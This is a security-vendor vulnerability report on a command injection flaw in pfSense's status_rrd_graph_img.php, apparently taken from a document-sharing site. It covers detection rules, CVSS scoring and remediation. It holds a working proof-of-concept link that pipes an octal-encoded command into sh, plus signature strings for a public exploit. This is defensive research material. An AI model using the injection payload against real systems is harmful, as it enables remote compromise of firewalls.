0020 08 ce 00 50 c0 d0 16 f6 a6 e9 b4 59 68 cd 50 18 ...P.......Yh.P.
0030 02 01 42 dc 00 00 48 54 54 50 2f 31 2e 31 20 32 ..B...HTTP/1.1 2
0040 30 30 20 4f 4b 0d 0a 45 78 70 69 72 65 73 3a 20 00 OK..Expires:
0050 53 61 74 2c 20 33 30 20 41 70 72 20 32 30 31 36 Sat, 30 Apr 2016
0060 20 32 30 3a 34 38 3a 35 32 20 47 4d 54 0d 0a 45 20:48:52 GMT..E
0070 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 32 36 20 xpires: Mon, 26
0080 4a 75 6c 20 31 39 39 37 20 30 35 3a 30 30 3a 30 Jul 1997 05:00:0
0090 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 0 GMT..Cache-Con
00a0 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 31 38 trol: max-age=18
00b0 30 30 30 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 0000..Cache-Cont
00c0 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e rol: no-store, n
00d0 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 o-cache, must-re
00e0 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d validate..Cache-
00f0 43 6f 6e 74 72 6f 6c 3a 20 70 6f 73 74 2d 63 68 Control: post-ch
0100 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b eck=0, pre-check
0110 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 =0..X-Frame-Opti
0120 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d ons: SAMEORIGIN.
0130 0a 43 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 69 .Content-type: i
0140 6d 61 67 65 2f 70 6e 67 0d 0a 4c 61 73 74 2d 4d mage/png..Last-M
0150 6f 64 69 66 69 65 64 3a 20 54 68 75 2c 20 32 38 odified: Thu, 28
0160 20 41 70 72 20 32 30 31 36 20 31 38 3a 34 38 3a Apr 2016 18:48:
0170 35 32 20 47 4d 54 0d 0a 50 72 61 67 6d 61 3a 20 52 GMT..Pragma:
0180 6e 6f 2d 63 61 63 68 65 0d 0a 54 72 61 6e 73 66 no-cache..Transf
0190 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 er-Encoding: chu
01a0 6e 6b 65 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c nked..Date: Thu,
01b0 20 32 38 20 41 70 72 20 32 30 31 36 20 31 38 3a 28 Apr 2016 18:
01c0 34 38 3a 35 32 20 47 4d 54 0d 0a 53 65 72 76 65 48:52 GMT..Serve
01d0 72 3a 20 6c 69 67 68 74 74 70 64 2f 31 2e 34 2e r: lighttpd/1.4.
0260 20 69 6e 20 2f 75 73 72 2f 6c 6f 63 61 6c 2f 77 in /usr/local/w
0270 77 77 2f 73 74 61 74 75 73 5f 72 72 64 5f 67 72 ww/status_rrd_gr
0280 61 70 68 5f 69 6d 67 2e 70 68 70 20 6f 6e 20 6c aph_img.php on l
0290 69 6e 65 20 31 32 37 32 0a 0d 0a ine 1272...

6. Attack Detection
6.1. Remote Detection of Generic Attacks
pfSense enforces HTTPS by default. In order to detect a generic attack using this vulnerability, the detection
device must decrypt the HTTPS packets and monitor the HTTP traffic on ports mentioned in the section entitled
"Attack Delivery.
HTTP is a request/response protocol described in RFCs 7230 - 7237 and other RFCs. A request is sent by a client
to a server, which in turn sends a response back to the client. An HTTP request consists of a request line, various
headers, an empty line, and an optional message body:
Request = Request-Line headers CRLF [message-body]
Request-Line = Method SP Request-URI SP HTTP-Version CRLF
Headers = *[Header]
Header = Field-Name ":" Field-Value CRLF
where CRLF represents the new line sequence Carriage Return (CR) followed by Line Feed (LF). SP represents
a space character. Parameters can be passed from the client to the server as name-value pairs in either the
Request-URI or in the message-body depending on the Method used and Content-Type header. For example, a
simple HTTP request passing a parameter named "param" with value "1", using the GET method might look like:
GET /my_webapp/mypaget.htm?param=1 HTTP/1.1
A corresponding HTTP request using the POST method might look like:
POST /my_webapp/mypaget.htm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
param=1
If there is more than one parameter/value pair, they are encoded as &-delimited name=value pairs:
var1=value1&var2=value2...
The detection device must look for HTTP requests to the following URI:
/status_rrd_graph_img.php
If a request to this URI is found, the detection device must analyze the value assigned to the request parameter
graph. If the value contains a pipe character "|" (or its case-insensitive URL-encoding, %7C), or the grave accent
"`" character (or in URL-encoded form, %60), then an attack exploiting this vulnerability is likely underway.
Note: All string matching described above must be done in a case-sensitive manner.
6.2. Remote Detection of Known Exploits

The generic detection described above is capable of detecting all known exploits for this vulnerability; however,
if the detection device would like to isolate cases using the public exploit provided by Francesco Oddo, it can do
so by searching for the following strings:
String 1:
\\145\\143\\150\\157
String 2:
\\160\\150\\160

String 3:
|
String 4:
status_rrd_graph_img.php
String 5:
graph=
If all of these strings are detected then an attack using the public exploit is likely underway.

7. Exploit Reproduction
7.1. Exploit Overview
TELUS Security Labs has provided a proof-of-concept poc.html to illustrate the impact of this vulnerability. To
trigger the vulnerability, click the hyperlink embedded within the HTML. Upon processing, a file named "test" should
be created in the "/tmp/" directory of pfSense.
Note that before this POC is used the "<target-ip>" string should be replaced with the IP address of the machine
running pfSense. The user clicking on the hyperlink should be an authenticated pfSense user.
7.2. Exploit Code

<html>
<head>
<title>TELUS Security Labs PoC</title>
</head>
<body>
<a href="http://<target-ip>/status_rrd_graph_img.php?
database=-throughput.rrd&graph=file|printf%20
\\164\\157\\165\\143\\150\\040\\057\\164\\155
\\160\\057\\164\\145\\163\\164|sh|echo">
Click here for PoC</a>
</body>
</html>

8. Public Exploits
8.1. Public Exploit [SA]
8.1.1. Exploit overview
The discoverer has published a proof of concept exploit demonstrating this vulnerability. The vulnerability has
been made available via:
http://www.security-assessment.com/files/documents/advisory/pfsenseAdvisory.pdf

9. Remediation Details
The risks posed by this vulnerability can be mitigated or eliminated by:
Applying the vendor-provided patch to eliminate the vulnerability.
Filtering attack traffic using information provided in the "Attack detection" section.
Not visiting untrusted websites.
The vendor has released the following advisory regarding this vulnerability:
https://www.pfsense.org/security/advisories/pfSense-SA-16_01.webgui.asc

10. Related Research

Not available.

11. Credits
Principal contributors, researchers, and reviewers for this report include the following members of the TELUS
Security Labs Research Team:
Vincent Lee
Sivathmican Sivakumaran

Vulnerability Report (ESF PfSense Status - RRD - Graph - Img - PHP Command Injection)

Enviado por

Dados do documento

Título original

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

Vulnerability Report (ESF PfSense Status - RRD - Graph - Img - PHP Command Injection)

Enviado por

Direitos autorais:

Formatos disponíveis

TELUS Security Labs

Vulnerability Research Service

ESF pfSense status_rrd_graph_img.php Command Injection

Copyright 2004-2012 TELUS Security Labs

PROPRIETARY AND CONFIDENTIAL

TELUS Security Labs Vulnerability Research Service 2

1.2. CVE Reference

1.3. OSVDB Reference

1.4. Vendor Advisory

1.5. Discoverer Advisory

1.6. Other Advisories

1.8. Vulnerability Classification and Severity

Vulnerability type: INPUT VALIDATION ERROR

1.8.2. Common Weakness Enumeration (CWE) Classification

TELUS Security Labs Vulnerability Research Service 3

Exploit code is publicly available.

This is a server compromise.

The vulnerability, if exploited, can lead to a root or system-level compromise.

The software affected by this vulnerability is significantly deployed.

The assets affected by this vulnerability are estimated to be of high value.

The attacker must have limited user privileges.

1.8.4. Common Vulnerability Scoring System (CVSS)

Access vector is network.

Access complexity is medium.

Level of authentication required is single.

Impact of this vulnerability on data confidentiality is complete.

Impact of this vulnerability on data integrity is complete.

Impact of this vulnerability on data availability is complete.

Temporal score is 7.0 (E:F/RL:OF/RC:C), based on the following metrics:

The exploitability level of this vulnerability is functional.

The remediation level of this vulnerability is official fix.

The report confidence level of this vulnerability is confirmed.

TELUS Security Labs Vulnerability Research Service 4

2.2. Other Products Embedding the Vulnerable Product

TELUS Security Labs Vulnerability Research Service 5

3.2. Function or Method

3.4. Data Objects

TELUS Security Labs Vulnerability Research Service 6

4.2. Source Code Walkthrough

if ($_GET['database']) { //this param not exploitable due to future checks

TELUS Security Labs Vulnerability Research Service 7

htmlspecialchars_decode($curdatabase, ENT_QUOTES | ENT_HTML401));

/* this is used for temp name */

[...Truncated for readability...]

//vulnerable exec() below

4.3. Open Questions to Resolve

TELUS Security Labs Vulnerability Research Service 8

5. Triggering the Problem

The attacker must be able to entice a user to visit a malicious website.

5.2. Triggering Conditions

5.3. Protocol Flow Diagram

5.4. Attack Delivery

HTTP, over port 80/TCP

5.4.3. File based vectors

5.5. Packet Decodes

A client sends a request:

TELUS Security Labs Vulnerability Research Service 9

Ethernet II, Src: Vmware_bd:e4:13 (00:50:56:bd:e4:13), Dst: Vmware_bd:7f:60 (00:50:56:bd:7f:60)

The server responds:

TELUS Security Labs Vulnerability Research Service 10

5.5.2. Attack cases

A client is enticed to visit a malicious website:

TELUS Security Labs Vulnerability Research Service 11